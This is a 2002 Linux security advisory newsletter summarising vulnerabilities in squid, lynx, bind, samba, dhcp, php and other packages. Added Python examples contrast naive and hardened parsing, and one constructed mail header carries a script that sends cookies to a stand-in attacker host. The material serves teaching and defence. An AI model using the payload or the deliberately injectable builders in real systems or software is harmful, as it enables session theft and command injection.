+----------------------------------------------------------------+
|  LinuxSecurity.com                         Linux Advisory Watch |
|  November 22nd, 2002                       Volume 3, Number 47a |
+----------------------------------------------------------------+

  Editors:     Dave Wreski                Benjamin Thomas
               dave@linuxsecurity.com     ben@linuxsecurity.com

Linux Advisory Watch is a comprehensive newsletter that outlines the
security vulnerabilities that have been announced throughout the week.
It includes pointers to updated packages and descriptions of each
vulnerability.

This week, advisories were released for squid, wwwoffled, lynx, tcpdump,
fetchmail, courier, KDE SSL, nullmailer, mhonarc, smrsh, bind, ypserv,
getbyname, ftpd, Red Hat kernel, samba, windowmaker, dhcp, php, and
gtetrinet. The distributors include Caldera, Conectiva, Debian, FreeBSD,
Gentoo, Mandrake, NetBSD, OpenPKG, Red Hat, SuSE, and Trustix.

Concerned about the next threat? EnGarde is the undisputed winner!
Hardened Linux Puts Hackers EnGarde! Winner of the Network Computing
Editor's Choice Award, EnGarde "walked away with our Editor's Choice
award thanks to the depth of its security strategy..." Find out what
the other Linux vendors are not telling you.
 http://ads.linuxsecurity.com/cgi-bin/ad_redirect.pl?id=engarde2

FEATURE: Security: MySQL and PHP (3 of 3) - This is the third
installment of a 3-part article on LAMP (Linux Apache MySQL PHP). In
order to safeguard a MySQL server to a basic level, one has to abide
by the following guidelines.
 http://www.linuxsecurity.com/feature_stories/feature_story-130.html

FEATURE: Security: Physical and Service (1 of 3) - The first
installment of a 3-part article covering everything from physical
security and service security to LAMP security (Linux Apache MySQL
PHP).
 http://www.linuxsecurity.com/feature_stories/feature_story-128.html

+---------------------------------+
|  Package: squid                 | ----------------------------//
|  Date: 11-14-2002               |
+---------------------------------+

Description: Several bug fixes and a cleanup of the Gopher client, both
to correct some security issues and to make Squid properly render
certain Gopher menus. Security fixes in how Squid parses FTP directory
listings into HTML. FTP data channels are now sanity-checked to match
the address of the requested FTP server, which prevents theft or
injection of transferred data by a third host.

Vendor Alerts:
 Caldera:
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-046.0/RPMS
    squid-2.5-20020429.i386.rpm       fdda342fe954cf6ea304046781a555c8
 Caldera Vendor Advisory:
  http://www.linuxsecurity.com/advisories/caldera_advisory-2574.html

+---------------------------------+
|  Package: KDE SSL               | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: Konqueror's cross-site scripting (XSS) protection fails to
initialize the domains on sub-(i)frames correctly. As a result,
JavaScript can access any foreign subframe that is defined in the HTML
source. KDE's SSL implementation fails to check the basic constraints
on certificates and as a result may accept as valid certificates that
were signed by an issuer who was not authorized to do so (a certificate
that is not itself a CA certificate being used to sign another).

Vendor Alerts:
 Caldera: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 Caldera Vendor Advisory:
  http://www.linuxsecurity.com/advisories/caldera_advisory-2579.html

+---------------------------------+
|  Package: wwwoffled             | ----------------------------//
|  Date: 11-18-2002               |
+---------------------------------+

Description: wwwoffled allows remote attackers to cause a denial of
service and possibly execute arbitrary code via a negative
Content-Length value.
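The squid and wwwoffled entries above both come down to a proxy trusting a value from the far end of the connection: the address in an FTP PASV reply and the sign of a Content-Length. The following is an added example of the two sanity checks those fixes describe, written for this issue rather than taken from Squid or WWWOFFLE; the PASV reply, the Content-Length values and the MAX_BODY policy limit are constructed for the illustration.

```python
"""Two proxy-side input checks: refuse an FTP data channel whose address
differs from the server being talked to, and refuse a Content-Length that
is not a plain unsigned decimal. Example code, not Squid's or WWWOFFLE's."""
import ipaddress
import re

# '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' as defined by RFC 959
PASV_RE = re.compile(
    r"227[^(]*\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def pasv_data_endpoint(reply, control_host):
    """Parse a PASV reply and return (host, port) for the data connection,
    refusing any address that is not the control-connection peer. Without
    this check a hostile or spoofed server can point the client's data
    connection at a third host, where the listing or file can be read
    or replaced."""
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError("not a well-formed 227 reply")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        raise ValueError("octet out of range in PASV reply")
    host = "%d.%d.%d.%d" % (h1, h2, h3, h4)
    port = p1 * 256 + p2
    if port == 0:
        raise ValueError("PASV reply names port 0")
    if ipaddress.ip_address(host) != ipaddress.ip_address(control_host):
        raise ValueError("PASV address %s differs from server %s" % (host, control_host))
    return host, port


MAX_BODY = 1 << 30   # per-request limit; an arbitrary policy value for this example
CL_RE = re.compile(r"[0-9]+")


def parse_content_length(value):
    """Strict Content-Length: an unsigned decimal integer and nothing else.
    A leading '-' is what the wwwoffled bug accepted; '+', embedded blanks,
    hex and empty values are rejected as well."""
    value = value.strip()
    if not CL_RE.fullmatch(value):
        raise ValueError("invalid Content-Length: %r" % value)
    n = int(value)
    if n > MAX_BODY:
        raise ValueError("Content-Length %d exceeds policy limit" % n)
    return n


def naive_content_length(value):
    """The failure mode: int(), like atoi() in C, happily accepts '-1'."""
    return int(value)


def as_size_t32(n):
    """What a negative length becomes once a C implementation stores it in
    a 32-bit unsigned size: -1 turns into 4294967295, which then feeds a
    buffer allocation or a read loop."""
    return n & 0xFFFFFFFF


def rejects(fn, *args):
    """True if fn(*args) raises ValueError (keeps the checks assertable)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False
```

The address comparison is done on parsed addresses rather than strings so that "192.0.2.010" and "192.0.2.10" cannot be made to look different; the Content-Length check deliberately refuses anything int() would tolerate beyond bare digits, because every extra form a parser accepts is one more thing an attacker can vary.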
Vendor Alerts:
 Caldera:
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-048.0/RPMS
    wwwoffle-2.6b-3MR.i386.rpm        d54de95d9db4d19501e6b50ef63f2e31
 Caldera Vendor Advisory:
  http://www.linuxsecurity.com/advisories/caldera_advisory-2586.html

+---------------------------------+
|  Package: lynx                  | ----------------------------//
|  Date: 11-18-2002               |
+---------------------------------+

Description: If lynx is given a URL containing certain special
characters on the command line, it will include faked headers in the
HTTP request it sends. This can be used to force scripts that use Lynx
for downloading files to access the wrong site on a web server with
multiple virtual hosts.

Vendor Alerts:
 Caldera:
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-049.0/RPMS
    lynx-2.8.4-1.i386.rpm             86aa0c385c7b4789aa33fe57dc209490
 Caldera Vendor Advisory:
  http://www.linuxsecurity.com/advisories/caldera_advisory-2587.html

+---------------------------------+
|  Package: tcpdump               | ----------------------------//
|  Date: 11-19-2002               |
+---------------------------------+

Description: There is a miscalculation in the use of the sizeof
operator in tcpdump, allowing, at the least, a denial-of-service
attack.

Vendor Alerts:
 Caldera:
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-050.0/RPMS
    tcpdump-3.6.2-4.i386.rpm          88099679d803eb7f1583f99ccaa68fed
 Caldera Vendor Advisory:
  http://www.linuxsecurity.com/advisories/caldera_advisory-2594.html

+---------------------------------+
|  Package: fetchmail             | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: Several buffer overflows have been found in fetchmail.
These bugs may be remotely exploitable if fetchmail is running in
multidrop mode.
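The lynx entry above and the php mail() entry later in this issue are the same bug class: a carriage return or line feed that reaches a line-oriented protocol lets whoever supplied the value append protocol lines of its own, a spare Host header in one case and extra recipients in the other. The following added example is illustration code for this newsletter, not lynx's or PHP's; the URL splitter is deliberately minimal, and the URLs, addresses and header values are constructed.

```python
"""CR/LF injection into line-oriented protocols, shown for an HTTP request
built from a URL and for mail headers built from form input, each beside a
version that refuses the injected characters. Example code, not lynx or PHP."""
from urllib.parse import quote


def split_http_url(url):
    """Minimal http:// splitter with, on purpose, no character validation."""
    if not url.startswith("http://"):
        raise ValueError("only http:// URLs in this example")
    host, _, path = url[len("http://"):].partition("/")
    return host, "/" + path


def parse_header_block(text):
    """What the receiving side sees: every CRLF starts a new 'Name: value'
    line. Returns (name, value) pairs in order, duplicates included."""
    pairs = []
    for line in text.split("\r\n"):
        if not line:
            break
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def has_control_chars(value):
    return any(ord(c) < 0x21 or ord(c) > 0x7e for c in value)


# --- lynx-style: request text built straight from the command-line URL ---

def http_request_naive(url):
    host, path = split_http_url(url)
    return "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (path, host)


def http_request_safe(url):
    """Refuse control characters in the host and percent-encode the path,
    so the request line and Host header can only be what the caller meant."""
    host, path = split_http_url(url)
    if has_control_chars(host):
        raise ValueError("control characters in host")
    path = quote(path, safe="/?=&%+~;:@,")   # CR and LF become %0D and %0A
    return "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (path, host)


def request_headers(request):
    """Headers of a request as a server parses them (start line dropped)."""
    return parse_header_block(request.split("\r\n", 1)[1])


# --- the same flaw in a contact-form script handing input to mail() ---

def mail_headers_naive(to, sender, subject):
    return "To: %s\r\nFrom: %s\r\nSubject: %s\r\n" % (to, sender, subject)


def mail_headers_safe(to, sender, subject):
    """One newline in any field is enough to add Bcc: lines, so refuse them."""
    for v in (to, sender, subject):
        if "\r" in v or "\n" in v:
            raise ValueError("newline in mail header value")
    return mail_headers_naive(to, sender, subject)


def recipients(header_text):
    """Every address line the MTA would deliver to: To, Cc and Bcc."""
    return [v for n, v in parse_header_block(header_text) if n in ("to", "cc", "bcc")]


def rejects(fn, *args):
    """True if fn(*args) raises ValueError (keeps the checks assertable)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False
```

Which of two Host headers a server honours is implementation-specific; the point of the check is that the request must not be able to carry a second one at all. On the mail side the same rule applies to every header-bound field, not just the subject: a script that only validates the address is still an open relay through the subject.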
Vendor Alerts:
 Caldera:
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-051.0/RPMS
    fetchmail-6.1.0-3.i386.rpm        434fea1951a0d2f3b84aacef99c64406
    fetchmailconf-6.1.0-3.i386.rpm    f4a95f399c696a47d30cb42076a16537
 Caldera Vendor Advisory:
  http://www.linuxsecurity.com/advisories/caldera_advisory-2599.html

+---------------------------------+
|  Package: courier               | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: A problem has been discovered in the Courier sqwebmail
package, a CGI program that grants authenticated access to local
mailboxes. Under certain circumstances the program did not drop its
privileges early enough on startup, so a local shell user can execute
the sqwebmail binary and read an arbitrary file on the local
filesystem.

Vendor Alerts:
 Debian: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 Debian Vendor Advisory:
  http://www.linuxsecurity.com/advisories/debian_advisory-2577.html
 Gentoo:
 Gentoo Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2588.html

+---------------------------------+
|  Package: nullmailer            | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: A problem has been discovered in nullmailer, a simple
relay-only mail transport agent for hosts that relay mail to a fixed
set of smart relays. When a mail is to be delivered locally to a user
that doesn't exist, nullmailer tries to deliver it, encounters a
"user unknown" error and stops delivering. Unfortunately, it stops
delivering entirely, not only this one mail, so a denial of service is
very easy to craft: one message to a non-existent local user halts
delivery of the whole queue.
Vendor Alerts:
 Debian:
  http://security.debian.org/pool/updates/main/n/nullmailer/nullmailer_1.00RC5-16.1woody2_ia64.deb
    Size/MD5 checksum:   144246 c508c104d7b775e84641aabdc2adf209
 Debian Vendor Advisory:
  http://www.linuxsecurity.com/advisories/debian_advisory-2584.html

+---------------------------------+
|  Package: mhonarc               | ----------------------------//
|  Date: 11-19-2002               |
+---------------------------------+

Description: Steven Christey discovered a cross-site scripting
vulnerability in mhonarc, a mail-to-HTML converter. Carefully crafted
message headers can introduce cross-site scripting when mhonarc is
configured to display all header lines on the web. It is often useful,
however, to restrict the displayed header lines to To, From and
Subject, in which case the vulnerability cannot be exploited.

Vendor Alerts:
 Debian:
  http://security.debian.org/pool/updates/main/m/mhonarc/mhonarc_2.4.4-1.2_all.deb
    Size/MD5 checksum:   453352 8e7f1a40ff78e0bef2d1c9593545baee
 Debian Vendor Advisory:
  http://www.linuxsecurity.com/advisories/debian_advisory-2589.html

+---------------------------------+
|  Package: smrsh                 | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: Users with a local account and the ability to create or
modify their `.forward' files can circumvent the smrsh restrictions.
This is mostly of consequence to systems that have local users who are
not normally allowed access to a login shell, as such users may abuse
this bug to execute arbitrary commands with normal user privileges.
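The mhonarc entry above makes two separate points: limiting which headers an archive page displays shrinks the attack surface, and whatever is displayed must still be HTML-escaped. The following added example renders a constructed message the way an archive page would, with a hostile X-Mailer header and markup in the Subject; it is illustration code for this newsletter, not MHonArc's, and the message and the DEFAULT_SHOWN list are constructed for it.

```python
"""Rendering mail headers into an archive page: a header allow-list beside
HTML escaping, to show that each is needed. Example code, not MHonArc's."""
import html
from email import message_from_string

# Constructed message: an ordinary From/To, markup smuggled into Subject,
# and a script payload in a header nobody normally looks at.
CONSTRUCTED_MESSAGE = (
    "From: Alice <alice@example.org>\n"
    "To: list@example.org\n"
    "Subject: Meeting <b>tomorrow</b>\n"
    "X-Mailer: <script>document.location='http://attacker.invalid/?'"
    "+document.cookie</script>\n"
    "\n"
    "See you there.\n"
)

# The restricted set the advisory recommends displaying.
DEFAULT_SHOWN = ("to", "from", "subject")


def render_headers(raw, show_all=False, escape=True):
    """Return an HTML list of the headers an archive page would display.
    show_all=True is the 'display all header lines' configuration the
    advisory warns about; escape=False is the missing step that makes it
    exploitable."""
    msg = message_from_string(raw)
    items = []
    for name, value in msg.items():
        if not show_all and name.lower() not in DEFAULT_SHOWN:
            continue
        shown = html.escape(value) if escape else value
        items.append("<li><b>%s:</b> %s</li>" % (html.escape(name), shown))
    return "<ul>\n" + "\n".join(items) + "\n</ul>"


def contains_raw_tag(rendered, tag):
    """True if an unescaped <tag ...> survives in the rendered HTML."""
    return ("<" + tag) in rendered.lower()
```

Escaping is the real fix: the allow-list only removes the headers an attacker controls most freely, but Subject is attacker-controlled too, and an archive that shows it unescaped is still injectable even with the restricted header set.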
Vendor Alerts:
 FreeBSD: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 FreeBSD Vendor Advisory:
  http://www.linuxsecurity.com/advisories/freebsd_advisory-2575.html

+---------------------------------+
|  Package: bind                  | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: BIND SIG Cached RR Overflow Vulnerability: a remote
attacker may be able to cause a name server with recursion enabled to
execute arbitrary code with the privileges of the name server process.
BIND OPT DoS and BIND SIG Expiry Time DoS: a remote attacker may be
able to cause the name server process to crash.

Vendor Alerts:
 FreeBSD: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 FreeBSD Vendor Advisory:
  http://www.linuxsecurity.com/advisories/freebsd_advisory-2576.html
 NetBSD:
 NetBSD Vendor Advisory:
  http://www.linuxsecurity.com/advisories/netbsd_advisory-2591.html
 OpenPKG:
 OpenPKG Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2580.html
 Trustix:
 Trustix Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2581.html

+---------------------------------+
|  Package: ypserv                | ----------------------------//
|  Date: 11-18-2002               |
+---------------------------------+

Description: A memory leak that can be triggered remotely was
discovered in ypserv 2.5 and earlier. This can lead to a denial of
service: repeated requests for a non-existent map cause ypserv to
consume more and more memory and to run more and more slowly. If the
system runs out of available memory, ypserv would also be killed.
Vendor Alerts:
 Mandrake:
  http://www.mandrakesecure.net/en/ftp.php
    9.0/RPMS/ypserv-2.5-1.1mdk.i586.rpm   d422a834b1869149b38bf1c8a1e8a4d6
 Mandrake Vendor Advisory:
  http://www.linuxsecurity.com/advisories/mandrake_advisory-2590.html

+---------------------------------+
|  Package: getbyname             | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: getnetbyname(3) and getnetbyaddr(3) lacked important
boundary checks and are vulnerable to malicious DNS responses, which
can cause a buffer overrun on the stack. The vulnerability could lead
to a remote root compromise if a privileged process uses these library
functions.

Vendor Alerts:
 NetBSD: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 NetBSD Vendor Advisory:
  http://www.linuxsecurity.com/advisories/netbsd_advisory-2592.html

+---------------------------------+
|  Package: ftpd                  | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: NetBSD's ftpd responds to the STAT command in a way that
is not standards-conformant when a filename containing "\n[0-9]" is
specified: the newline followed by a digit makes part of the filename
look like the start of a new reply line. This could be used by a
malicious party to corrupt state tables in firewall devices between an
FTP client and a NetBSD FTP server.

Vendor Alerts:
 NetBSD: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 NetBSD Vendor Advisory:
  http://www.linuxsecurity.com/advisories/netbsd_advisory-2593.html

+---------------------------------+
|  Package: Red Hat kernel        | ----------------------------//
|  Date: 11-15-2002               |
+---------------------------------+

Description: The kernels in Red Hat Linux 7.1, 7.1K, 7.2, 7.3, and
8.0 are vulnerable to a local denial of service attack. Updated
packages are available which address this vulnerability, as well as
bugs in several drivers.
Vendor Alerts:
 Red Hat: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 Red Hat Vendor Advisory:
  http://www.linuxsecurity.com/advisories/redhat_advisory-2578.html
 Trustix:
 Trustix Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2582.html

+---------------------------------+
|  Package: samba                 | ----------------------------//
|  Date: 11-18-2002               |
+---------------------------------+

Description: The error consists of a buffer overflow in a commonly used
routine that accepts user input and may write up to 127 bytes past the
end of a statically sized buffer, leaving enough room for an exploit.
The resulting vulnerability can be exploited locally in applications
using the pam_smbpass Pluggable Authentication Module (PAM). It may be
possible to exploit this vulnerability remotely, causing the running
smbd to crash or even to execute arbitrary code.

Vendor Alerts:
 SuSE:
  ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-2.2.5-124.i586.rpm
    f0a94ef6cc49165d4dace59caaf359d7
  ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-client-2.2.5-124.i586.rpm
    f694fb4aaabffa98b6a76941cb2c0eaf
 SuSE Vendor Advisory:
  http://www.linuxsecurity.com/advisories/suse_advisory-2598.html
 Gentoo:
 Gentoo Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2597.html

+---------------------------------+
|  Package: windowmaker           | ----------------------------//
|  Date: 11-18-2002               |
+---------------------------------+

Description: A possible scenario for this vulnerability is that of an
attacker making a specially crafted image available and convincing an
unsuspecting user to set it as a background image.
Vendor Alerts:
 Conectiva: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 Conectiva Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2583.html

+---------------------------------+
|  Package: dhcp                  | ----------------------------//
|  Date: 11-18-2002               |
+---------------------------------+

Description: Simon Kelley pointed out a vulnerability in the way quotes
inside the variable assignments the client generates from DHCP
responses are treated. By exploiting this, a malicious DHCP server (or
an attacker able to spoof DHCP responses) can execute arbitrary shell
commands on the DHCP client, which runs as root.

Vendor Alerts:
 Conectiva:
  ftp://atualizacoes.conectiva.com.br/8/RPMS/dhcpcd-1.3.22pl3-1U80_1cl.i386.rpm
 Conectiva Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2585.html

+---------------------------------+
|  Package: php                   | ----------------------------//
|  Date: 11-20-2002               |
+---------------------------------+

Description: Two vulnerabilities exist in the PHP mail() function. The
first allows any program or script to be executed, bypassing the
safe_mode restriction; the second may turn a script into an open relay
if the mail() function is not used carefully (unchecked input reaching
the header arguments).

Vendor Alerts:
 Gentoo: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 Gentoo Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2595.html

+---------------------------------+
|  Package: gtetrinet             | ----------------------------//
|  Date: 11-20-2002               |
+---------------------------------+

Description: Several buffer overflows were found in gtetrinet versions
below 0.4.3. According to the authors these could be remotely
exploited.

Vendor Alerts:
 Gentoo: PLEASE SEE VENDOR ADVISORY FOR UPDATE
 Gentoo Vendor Advisory:
  http://www.linuxsecurity.com/advisories/other_advisory-2595.html

------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc.                LinuxSecurity.com

To unsubscribe email vuln-newsletter-request@linuxsecurity.com with
"unsubscribe" in the subject of the message.
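The dhcp entry above describes option values from the network being written into shell variable assignments that a root-run script later evaluates. The following added example shows why wrapping such a value in double quotes is not enough and what proper quoting looks like; it assumes that write-assignments-then-eval pattern, which the advisory implies but does not spell out, and the option values are constructed. This is illustration code for this newsletter, not dhcpcd's.

```python
"""Shell metacharacter injection through a DHCP option written as a shell
assignment, beside the quoting that prevents it. Example code, not dhcpcd's."""
import re
import shlex

# A hostname: labels of letters, digits and hyphens, joined by dots.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def assignment_naive(name, value):
    """Wrap the value in double quotes and hope. A value containing a double
    quote closes the string, and whatever follows is parsed as further
    commands by the shell that evaluates the file."""
    return '%s="%s"' % (name, value)


def assignment_safe(name, value):
    """shlex.quote single-quotes the value and escapes any embedded single
    quote, so the shell sees exactly one assignment whatever the value is."""
    return "%s=%s" % (name, shlex.quote(value))


def shell_words(line):
    """Tokenise the line the way a POSIX shell would; with punctuation_chars
    set, ';' comes out as a token of its own, so injected commands show up."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def command_count(line):
    """Number of ';'-separated commands the shell would run for this line."""
    return 1 + sum(1 for w in shell_words(line) if w == ";")


def hostname_option_ok(value):
    """Validate the option against what a hostname may contain before it is
    stored anywhere at all; quoting protects the shell, this protects
    everything downstream of it."""
    return len(value) <= 253 and bool(HOSTNAME_RE.match(value))
```

Quoting correctly fixes the shell evaluation; validating the value against the syntax it is supposed to have is the broader fix, because the same value is also handed to other consumers (hostname, resolver configuration) with their own parsers.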
------------------------------------------------------------------------